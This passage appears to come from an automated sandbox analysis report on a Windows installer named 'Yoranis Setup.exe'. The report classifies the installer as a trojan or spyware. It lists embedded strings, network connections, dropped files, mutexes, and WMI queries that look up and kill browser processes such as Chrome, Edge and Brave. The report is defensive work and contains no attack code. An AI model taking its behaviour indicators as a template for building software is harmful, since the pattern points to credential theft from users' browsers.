Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://unpkg.com/yargs-parser
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#grammardef-option-expression
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#integrity-metadata-description
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#parse-metadata
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cl.cam.ac.uk/%7Emgk25/ucs/utf8_check.c
Source: resources.pak.0.drString found in binary or memory: https://www.google.com/
Source: uk.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.html
Source: fr.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.html&AideG
Source: pt-BR.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlA&judaGerenciado
Source: en-US.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlH&elpManaged
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.npmjs.com/package/buffer-alloc)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.npmjs.com/package/buffer-from)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.npmjs.com/package/safe-buffer)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.npmjs.com/package/safer-buffer)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.npmjs.com/package/wrap-ansi
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.patreon.com/feross
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://yargs.js.org/
Source: unknownNetwork traffic detected: HTTP traffic on port 59265 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56955
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50333
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54264
Source: unknownNetwork traffic detected: HTTP traffic on port 51686 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64452
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65304
Source: unknownNetwork traffic detected: HTTP traffic on port 57333 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51502 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52031 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53298
Source: unknownNetwork traffic detected: HTTP traffic on port 51695 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56955 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58071
Source: unknownNetwork traffic detected: HTTP traffic on port 59236 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62487 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58070
Source: unknownNetwork traffic detected: HTTP traffic on port 60791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53986
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51686
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59570
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51537 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55939
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52944
Source: unknownNetwork traffic detected: HTTP traffic on port 54264 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52033 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51694
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51695
Source: unknownNetwork traffic detected: HTTP traffic on port 53298 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58070 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51696
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51575
Source: unknownNetwork traffic detected: HTTP traffic on port 53030 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51697
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52031
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52032
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58771
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64452 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51502
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52033
Source: unknownNetwork traffic detected: HTTP traffic on port 55728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57446
Source: unknownNetwork traffic detected: HTTP traffic on port 51696 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57333
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59236
Source: unknownNetwork traffic detected: HTTP traffic on port 51776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57446 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 59570 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 56842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65377 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65304 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62487
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53703
Source: unknownNetwork traffic detected: HTTP traffic on port 59924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52032 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59925
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52572
Source: unknownNetwork traffic detected: HTTP traffic on port 62305 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 61788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51694 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53030
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64794
Source: unknownNetwork traffic detected: HTTP traffic on port 51575 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51537
Source: unknownNetwork traffic detected: HTTP traffic on port 55939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52572 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57123 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50333 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62305
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57123
Source: unknownNetwork traffic detected: HTTP traffic on port 61452 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59265
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61452
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65377
Source: conhost.exeProcess created: 61
Source: cmd.exeProcess created: 110

System Summary

barindex
Drops large PE files
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile dump: YoransSetup.exe.0.dr 173936640Jump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile dump: YoransSetup.exe0.0.dr 173936640Jump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeProcess token adjusted: SecurityJump to behavior
Source: YoransSetup.exe0.0.drStatic PE information: Number of sections : 15 > 10
Source: vulkan-1.dll0.0.drStatic PE information: Number of sections : 11 > 10
Source: libEGL.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: libGLESv2.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: vk_swiftshader.dll0.0.drStatic PE information: Number of sections : 11 > 10
Source: dxcompiler.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: vulkan-1.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: vk_swiftshader.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: libGLESv2.dll0.0.drStatic PE information: Number of sections : 11 > 10
Source: dxcompiler.dll0.0.drStatic PE information: Number of sections : 11 > 10
Source: libEGL.dll0.0.drStatic PE information: Number of sections : 11 > 10
Source: YoransSetup.exe.0.drStatic PE information: Number of sections : 15 > 10
Source: Yoranis Setup.exe, 00000000.00000003.330026958969.0000000005E36000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs Yoranis Setup.exe
Source: Yoranis Setup.exe, 00000000.00000003.330047764144.0000000007A01000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Yoranis Setup.exe
Source: Yoranis Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: // did the user specify their own .sln file?
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: * On Windows, find the first build/*.sln file.
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: glob('build/*.sln', function (err, files) {
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: return path.extname(arg) === '.sln'
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: print('Usage: %s "c:\\path\\to\\project.sln"' % sys.argv[0])
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: return callback(new Error('Could not find *.sln file. Did you run "configure"?'))
Source: classification engineClassification label: mal72.troj.spyw.evad.winEXE@322/386@13/9
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2744:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8508:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1740:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:600:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:816:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2620:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2108:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5184:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6884:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5832:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5612:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4868:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8332:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1656:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:600:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1588:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5616:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4368:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2264:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1912:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4328:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1588:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6232:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6632:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:816:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2264:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1912:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3368:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5612:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8332:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2424:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4792:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2108:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4368:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8684:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6752:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4788:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3368:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4868:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5832:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8860:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4120:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8684:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8772:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4852:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2700:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1656:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8772:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4852:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8508:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2620:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8596:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2700:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6732:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8240:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8240:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1740:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4792:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2424:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2908:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4328:120:WilError_03
Source: C:\Users\user\Desktop\Yoranis Setup.exeMutant created: \Sessions\1\BaseNamedObjects\b4a0680f-9ee1-57b1-adfd-e68812be32d6
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8860:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6884:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6128:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:720:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6632:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2480:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8420:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4364:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8596:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1116:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6732:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1116:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:720:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4120:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5616:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6128:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6752:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2744:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4788:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2480:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5184:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6232:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2908:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4364:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8420:304:WilStaging_02
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsc3472.tmpJump to behavior
Source: Yoranis Setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'YORANSSETUP.EXE'
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "7star.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'IEXPLORE.EXE'
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "brave.exe")
